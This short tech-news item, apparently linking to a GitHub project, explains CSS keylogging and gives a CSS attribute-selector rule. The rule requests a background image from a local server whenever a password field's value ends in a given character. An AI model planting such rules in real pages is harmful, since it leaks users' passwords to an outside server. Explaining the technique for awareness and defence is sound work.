Security github.com

CSS key logging is a thing?! 😱  â†¦

Turns out it definitely can be, as long as you are using a component-style JavaScript tool (such as React) that updates input values on every keypress. Here’s how it works:

Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

Add some CSS that looks like this:

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

When the user types an a in to the password field, it will hit your server for logging. Dastardly!


Discussion

Sign in or Join to comment or subscribe

Player art
  0:00 / 0:00